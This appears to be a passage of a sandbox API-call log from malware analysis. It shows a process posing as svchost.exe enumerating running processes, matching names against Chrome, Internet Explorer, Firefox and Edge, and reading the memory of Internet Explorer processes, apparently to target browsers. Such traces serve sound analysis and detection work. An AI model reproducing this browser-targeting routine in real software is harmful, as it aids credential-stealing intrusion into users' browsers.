	[0201.678] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.679] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0201.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.679] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.679] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0201.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x206c
	[0201.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.680] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0201.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.680] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.681] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0201.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.681] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.681] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0201.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2070
	[0201.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.682] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0201.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.682] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.683] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0201.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.683] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.684] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0201.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2074
	[0201.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.757] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0201.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.757] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.757] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0201.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.757] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.758] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0201.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2078
	[0201.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.758] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0201.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.759] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.760] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0201.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.760] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.761] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0201.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x207c
	[0201.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.762] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0201.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.762] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.762] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0201.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.763] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.763] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0201.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2080
	[0201.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.764] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0201.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.764] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.765] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0201.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.765] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.765] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0201.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2084
	[0201.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.766] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0201.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.766] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.766] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0201.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.767] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.767] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0201.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2088
	[0201.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.768] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0201.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.768] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.769] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0201.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.769] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.769] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0201.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x208c
	[0201.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.770] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0201.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.771] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.771] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0201.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.772] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.772] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0201.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2090
	[0201.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.773] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0201.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.774] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.774] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0201.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.775] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.775] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0201.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2094
	[0201.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.776] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0201.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.776] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.777] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0201.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.778] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.779] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0201.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2098
	[0201.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.780] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0201.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.780] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.781] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0201.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.781] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.782] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0201.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x209c
	[0201.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.783] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0201.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.783] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0201.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.783] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0201.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.784] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.784] NtQueryInformationProcess (in: ProcessHandle=0x209c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0201.784] ReadProcessMemory (in: hProcess=0x209c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0201.784] ReadProcessMemory (in: hProcess=0x209c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0201.784] ReadProcessMemory (in: hProcess=0x209c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0201.784] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0201.784] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0201.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x20a0
	[0201.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.785] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0201.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.785] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0201.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.786] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0201.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.786] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.786] NtQueryInformationProcess (in: ProcessHandle=0x20a0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0201.786] ReadProcessMemory (in: hProcess=0x20a0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0201.786] ReadProcessMemory (in: hProcess=0x20a0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0201.786] ReadProcessMemory (in: hProcess=0x20a0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0201.787] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0201.787] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x20a4
	[0201.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.788] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.788] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.788] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.788] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.789] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0201.789] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x20a8
	[0201.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.789] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0201.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.790] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.790] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0201.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.790] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.791] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x20ac
	[0201.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.791] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.792] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.792] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.792] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.792] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.793] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0201.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x20b0
	[0201.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.794] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.794] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.795] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.795] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.795] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x20b4
	[0201.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.796] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.796] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.796] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.797] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.797] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0201.798] CloseHandle (hObject=0x188) returned 1
	[0201.798] Sleep (dwMilliseconds=0x64) 
	[0201.914] GetCurrentProcessId () returned 0x110
	[0201.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0201.916] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0201.916] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0201.917] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0201.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x20b8
	[0201.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.918] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.918] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.918] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.919] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.919] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0201.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x20bc
	[0201.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.920] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.920] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.920] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.920] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
